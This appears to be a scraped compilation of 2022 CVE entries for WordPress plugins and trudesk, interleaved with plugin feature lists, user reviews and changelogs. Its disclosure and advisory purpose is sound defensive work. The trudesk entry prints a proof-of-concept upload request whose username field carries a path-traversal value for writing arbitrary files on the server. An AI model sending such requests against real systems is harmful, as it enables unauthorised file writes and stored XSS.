The Domain Replace WordPress plugin through 1.3.8 does not sanitise and escape a parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

CVE-2022-1218

The Turn off all comments WordPress plugin through 1.0 does not sanitise and escape the rows parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

CVE-2022-1192

The XML Sitemap Generator for Google WordPress plugin before 2.0.4 does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.

CVE-2022-0346

Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.

**Description**

The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

**Proof of Concept**

    1. Login 
    2. Upload profile image
    3. Capture request, modify `username` and `filename`
    

    POST /accounts/uploadImage HTTP/1.1
    Host: 192.168.20.132:8118
    Content-Length: 452
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
    Origin: http://192.168.20.132:8118
    Referer: http://192.168.20.132:8118/accounts
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
    Connection: close
    
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="username"
    
    /../../../../../../testpathtravesal1
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="_id"
    
    627ce4cd7778b2c5b5f49851
    ------WebKitFormBoundaryQXoDBooqQ26crHR0
    Content-Disposition: form-data; name="image"; filename="filename.anything"
    Content-Type: image/jpeg
    
    <image content>
    ------WebKitFormBoundaryQXoDBooqQ26crHR0--
    
    

 

**Impact**

Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)

**Occurrences**

accounts.js L485-L505

This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type

CVE-2022-1752: Unrestricted File Upload and Path Traversal in upload image in trudesk

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

CVE-2022-29434: Spiffy Calendar

Multiple Authenticated (administrator or higher user role) Persistent Cross-Site Scripting (XSS) vulnerabilities in TMS-Plugins wpDataTables plugin <= 2.1.27 on WordPress via &data-link-text, &data-link-url, &data, &data-shortcode, &data-star-num vulnerable parameters.

CVE-2022-29432: wpDataTables – Tables & Table Charts

Cross-Site Scripting (XSS) vulnerability in KubiQ's PNG to JPG plugin <= 4.0 at WordPress via Cross-Site Request Forgery (CSRF). Vulnerable parameter &jpg_quality.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Convert PNG images to JPG, free up web space and speed up your webpage

*   set quality of converted JPG
*   auto convert on upload
*   auto convert on upload only when PNG has no transparency
*   only convert image if JPG filesize is lower than PNG filesize
*   leave original PNG images on the server
*   convert existing PNG image to JPG
*   bulk convert existing PNG images to JPG
*   conversion statistics

1.  Upload png-to-jpg directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

Best work, fast speed when png convert to jpg

I had a client site where the developers used ALL PNG IMAGES and it was SLOW. Thank you for this awesome plugin you saved me a ton of time not having to convert manually & re-upload via GIMP!

Easy to use and efficient. The bulk convert page loads fast, the images were generated and replaced neatly. I saved over 80MB converting approximately 350 PNGs, and this was only a test run. Lovely plugin!

The plugin converts the format and replaces the address in the database well and without any problems. Be sure to back up before use to avoid problems

I used it on WordPress 5.7.1. The plugin does what it should do. Converting 200 images took about 3 minutes. I hope it will be updated soon. Using old plugins is always a bit scary.

Плагин нашел лишь малую часть моих PNG. Затем заменил полноразмерные png на jpg при этом они все исчезли из тех записей где стояли. Также (!) уменьшенные варианты этих же изображений ОН ОСТАВИЛ В ТОМ ЖЕ ФОРМАТЕ PNG. Таким образом были убиты самые большие PNG и больше ничего не изменилось. Я это делал птому что у меня есть backup сайта 🙂

Read all 32 reviews

“PNG to JPG” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**4.1**

*   added nonce and security checks
*   added button to stop transparency detection or conversion process
*   removed DB prefix from notice table names to make it more readable
*   remove preview box flex centering to make it works with bigger images
*   auto delete PNG backup when JPG deleted in admin

**4.0**

*   replace images also in post\_excerpt
*   separate SQL queries
*   added support for FV Player plugin

**3.9.1**

*   tested on WP 5.9
*   check if file really exists and if has .png extension

**3.9**

*   fix transparency default state

**3.8**

*   tested on WP 5.4
*   save transparency meta and load it instantly next time
*   image viewer – background switch
*   image viewer – centered image
*   image viewer – highlight image borders and show image size on hover

**3.7**

*   do not run second transparency detection if first one return true

**3.6**

*   metadata update fix

**3.5**

*   added support for Broken Link Checker plugin ( blc\_instances, blc\_links )

**3.4**

*   replace image url also in these database tables: yoast\_seo\_links, revslider\_static\_slides

**3.3**

*   tested on WP 5.2
*   handle duplicate names like WP – adding increment
*   optimizing code for faster processing

**3.2**

*   added support for Fancy Product Designer plugin

**3.1**

*   tested on WP 5.0
*   small cosmetic code changes

**3.0**

*   new option: convert only if JPG will have lower filesize then PNG
*   new feature: show converted images statistics
*   fix: conflict when there is already JPEG with a same name as PNG
*   fix: conflict when PNG name is part of another PNG name ( eg. ‘xyz.png’ can rename also ‘abcxyz.png’ )
*   optimized for translations

**2.6**

*   rename PNG image if JPG with the same name already exists

**2.5**

*   BUG FIXED – disabled checkboxes when autodetect is disabled

**2.4**

*   now you can disable autodetect PNG transparency

**2.3**

*   WP 4.9.1 compatibility check
*   new compatibility with Toolset Types

**2.2**

*   Repair revslider database table detection

**2.1**

*   Added option to leave original PNG image on server after conversion
*   Repair SQL replacement query

**2.0**

*   Replace image and thumbnails extension in database tables
*   Moved from Settings to Tools submenu
*   Some small fixes

**1.2**

*   Fix generating background for transparent images (thanks @darkcobalt)

**1.1**

*   Fix PNG transparency detection

**1.0**

*   First version

CVE-2022-29430: PNG to JPG

Cross-Site Scripting (XSS) vulnerability in Muneeb's WP Slider Plugin <= 1.4.5 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 20, 2022 and is not available for download. This closure is temporary, pending a full review.

Installed plugin, added slides but I couldn't attach a photo to any of the slides. What gives?

Works as described, but you should also ask yourself whether you really need a slider. http://www.theseotailor.com.au/knowledge-base/do-i-need-a-slider/

The slider supports custom links for the images or slides. For instructions please visit the link below. https://wordpress.org/support/topic/linking-from-slides?replies=3 Captions are also support please visit the below for the instructions https://wordpress.org/support/topic/i-cant-visualize-description-in-caption-box?replies=5

Read all 37 reviews

“WP Slider Plugin” is open source software. The following people have contributed to this plugin.

Contributors

*    Muneeb

CVE-2022-29428: WP Slider Plugin

Authenticated (contributor or higher user role) Reflected Cross-Site Scripting (XSS) vulnerability in 2J Slideshow Team's Slideshow, Image Slider by 2J plugin <= 1.3.54 at WordPress.

**2j-slideshow**

**Software**

**Images Slideshow by 2J**

**Vulnerable Versions**

**<= 1.3.54**

**Fixed in version**

**CVE**

**CVE-2022-29426**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-05-04**

**CVSS 3.0 score**

**Requires contributor or higher role user authentication.**

**Are your websites subject to this vulnerability?**

**Details**

**Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered by Tien Nguyen Ahn aka vigov5 (Patchstack Alliance) in WordPress Slideshow, Image Slider by 2J plugin (versions <= 1.3.54).**

**Solution**

**No patched version is available. No reply from the vendor.**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-29426: WordPress Slideshow, Image Slider by 2J plugin <= 1.3.54 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (admin or higher user role) Reflected Cross-Site Scripting (XSS) vulnerability in Biplob Adhikari's Image Hover Effects Ultimate plugin <= 9.7.1 at WordPress.

**image-hover-effects-ultimate**

**Software**

**Image Hover Effects Ultimate**

**Vulnerable Versions**

**<= 9.7.1**

**Fixed in version**

**9.7.2**

**CVE**

**CVE-2022-29424**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-05-04**

**CVSS 3.0 score**

**Requires high role user authentication like admin.**

**Are your websites subject to this vulnerability?**

**Details**

**Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered by Nguy Minh Tuan (Patchstack Alliance) in WordPress Image Hover Effects Ultimate plugin (versions <= 9.7.1).**

**Solution**

**Update the WordPress Image Hover Effects Ultimate plugin to the latest available version (at least 9.7.2).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

Tag

#xss